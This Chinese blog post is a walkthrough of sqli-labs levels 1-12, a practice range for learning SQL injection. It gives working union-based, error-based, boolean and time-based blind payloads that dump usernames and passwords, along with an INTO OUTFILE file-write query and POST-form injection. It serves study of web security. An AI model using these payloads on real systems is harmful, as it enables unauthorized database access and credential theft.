sqli-labs靶场1-12关通关记录

已于 2022-07-26 16:45:39 修改
阅读量1.6k 收藏 3
点赞数
分类专栏: web安全 文章标签: sql web安全
于 2022-07-25 22:34:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SEV__en/article/details/125984313
版权

       最近刚学习了SQL注入的基本操作,这里浅浅记录一下有关SQLi-labs通关的相关内容。

概述

SQL注入        

        攻击者通过注入SQL语句片段导致后端执行预期外的SQL查询。

漏洞危害

  1. 数据被窃取
  2. 服务器被攻击者控制
  3. 网站页面被篡改

sqli靶场关卡记录

第一关

1.根据报错提示,确定闭合符为单引号

2.使用 order by 确定列数,即 ?id=1' order by 3%23

3.获取数据库名

?id=111111' union select 1,2,database()%23

4.获取表名  

?id=111111' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23

4.查询所需表的列名

?id=111111' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'%23

5.拼接查询用户所有信息

?id=111111' union select 1,2,group_concat(concat_ws('|',username,password) ) from users%23

 第二关

  1. 通过2-1 算式判断出注入类型为数字型注入
  2. 之后操作同上一关,先判断列数,然后获取数据库名,查询表名、列名,查询用户信息

第三关

  1. 根据错误判断可知 归并符号为 ‘)
  2. 之后操作和前面类似,先判断列数,然后获取数据库名,查询表名、列名,查询用户信息。

第四关

  1. 根据错误判断可知 归并符号为 “)
  2. 之后操作同前,先判断列数,然后获取数据库名,查询表名、列名,查询用户信息。

第五关

  1. 方法一:通过页面结果发现,输出相同,所以考虑布尔盲注。使用ascii(mid(database(),1,1))>114 判断注入结果是否正确,这里可知数据库名第一个字符为 s ,因此可用类似的方法得到所有结果。
  2. 方法二:使用报错注入。通过extractvalue()函数可以爆出数据库名,因此也可用类似的方法爆出所需信息。

?id =1' union select 1,(extractvalue(1,concat(0x7e,(database()),0x7e))),3%23

第六关

同第五关

第七关

  1. 根据提示可知需要使用写入文件的SQL语句
  2. Union select 1,2,database() into outfile “c:/res.txt” 可将数据库名写入res.txt文件中。其他信息写入可采用类似方法。

第八关

同理

第九关

  1. 发现所有输入都会返回相同页面,因此可用考虑用时间盲注,根据查询结果的正误所导致的时间延迟来判断正确性。根据1’ and sleep(3)%23可知归并符号为 单引号
  2. 之后操作同布尔盲注,后面还需加入含有时间延迟的判断条件,具体见下图。因此可根据页面返回时间判断结果是否正确。

第十关

  1. 发现其情况也符合时间盲注,且判断得出闭合符为 ”,其余同第九关。

第十一关

  1. 这里的注入点为提交表单,因此将注入语句写在username一栏中。方法同前的字符型注入,闭合符为 ’

a' order by 2#

    2. 最后在username注入,得到数据库名和所需用户信息

第十二关

  1. 方法同第十一关,根据判断可知闭合符为 “)
  2. 使用类似的注入语句得到数据库名,因此也可得到用户信息。

总结

这里总结一下SQL注入的大致思路:       

  1. SQL注入首先需要找到注入点,是URL还是表单亦或是其他。
  2. 根据页面返回的提示(返回都一样也是提示,比如时间盲注),初步判断属于哪种SQL注入类型。
  3. 判断闭合符号
  4. order by 判断列数(采用二分法加快速度)
  5. union 查询库名、表名、列名等所需信息。

SEV_
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Sqli-lab教程-史上最全详解(1-22通关
wangluoanquan111的博客
04-20 766
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
sqli-labs第十二
yuqnqi的博客
05-08 762
对了,也可以用报错注入,下次再写。由此判断为,双引号反括号闭合;post传值,跟十一差不多。就是正常的sql注入流程。第一步,判断闭合方式。
sql注入---sqli靶场1-9
weixin_72202802的博客
05-07 499
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。
sqli-labs靶场(1-22
weixin_51566481的博客
08-16 7465
sqli-labs,sql注入,burpsuit
sqli-labs靶场通关秘籍分享(1-10
weixin_45585955的博客
04-16 2619
一、 1、SQL注入原理:sql语句未经查询直接带入数据库查新,sql注入攻击其实就是服务端的攻击,它与操作系统、服务器类型、脚本语言无 2、sql注入类型:分为数字型、字符型、搜索型、xx型 3、注入提交方式:get提交、post提交、cookie提交。 4、注入攻击提交支持的类型 union注入、information_schema、宽字节注入、报错注入、盲注,这里的盲注分为三种,分别是 布尔型盲注、时间型盲注、报错型盲注。 updatexml注入分为 insert注入、update注入
SQLMAP与SQL注入实战演练 赠送靶场
01-24
课程涵盖:1. SQLMAP基础使用,带你由浅入深掌握技能。2. 5种注入模式的详解,进一步了解实操手法。3. 高级进阶技巧,让你突破更多的瓶颈。4.还提供多达 80 的独家授权靶场!学以致用,方能成器!理论+实战的教学模式,让你真正的做到边学边练,即学即用!本次福利课程仅需12元!
Sqli-labs-master靶场1-23通关详细教程(基础篇)
一纸荒芜的博客
06-23 5186
Sqli-labs-master靶场1-23通关详细教程(基础篇)
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24练习内容,可以供给初学sql注入的学者参考
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场
最新发布
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
SQLI-LABS 靶场通关小记(1~22)
曹振国的博客
07-14 2787
1~22Less-1:1.查询字段数2.查询输出点3.查询库名4.查询表名5.查询字段名6.查询数据Less-2:1.查询输出点Less-3:1.查询输出点Less-4:1.查询输出点Less -5:1.使用left()函数进行截取测试2.使用length判断长度3.利用ascii码猜测数据库名4.使用二分法进行盲注查表名Less-6:1.使用length判断长度Less-7:1.查看源码2.写入一句话木马连接蚁剑Less-8:1.使用length判断长度Less-9:1.使用sleep()函数进行时间盲注
sqli-labs靶场第十二
gou1791241251的博客
12-27 750
第十二与第十一差在了单引号和双引号, admin") or (select table_name from information_schema.tables where table_schema=database())=‘emails’ # 执行同样的操作即可查询出数据库的信息啦。
sql-lib 1-10
鸣蜩十四的博客
06-14 653
1. 字符型 http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败 http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功 http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23 查看所有数据库 ht...
bwapp---sql注入第十二过程及分析
weixin_45821250的博客
12-07 2524
SQL Injection - Stored (User-Agent) Your IP address and User-Agent string have been logged into the database! (download log file)
sqlilabs靶场1—20题学习笔记(思路+解析+方法)
2301_79355407的博客
04-16 1443
此文章为初学者在学习SQL注入使用sqlilabs靶场的学习笔记,均为手工注入,未使用sqlmap。有很多出错以及不懂的地方。此文章会不断补充和更正。
sqli-labs过笔记(Page-1:1-22
1stPeak's Blog
03-23 1219
判断注入类型详解 (1)首先id=1肯定没错 http://127.0.0.1/?id=1 //正常 (2)加单引号 http://127.0.0.1/?id=1' //正常,很大几率不存在注入;不正常,存在注入 (3)判断数字型 http://127.0.0.1/?id=1 and 1=1//正常 http://127.0.0.1/?id=1 and 1=2//不正常 基本上可以确定是数字型...
Sqli-labs靶场笔记1(Less-1 SQL注入基本操作)
m0_52233414的博客
03-31 416
sqli-labs靶场使用的是mysql数据库,所以在打之,我们要了解一下mysql数据库的结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。
sqli-labs靶场通关
08-25
对于sqli-labs靶场通关,你需要具备一定的SQL注入的知识和技巧。以下是一些通关的步骤和提示: 1. 确保你已经安装了LAMP/WAMP/MAMP服务器环境,并将sqli-labs源码解压到Web服务器的根目录下。 2. 打开浏览器,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值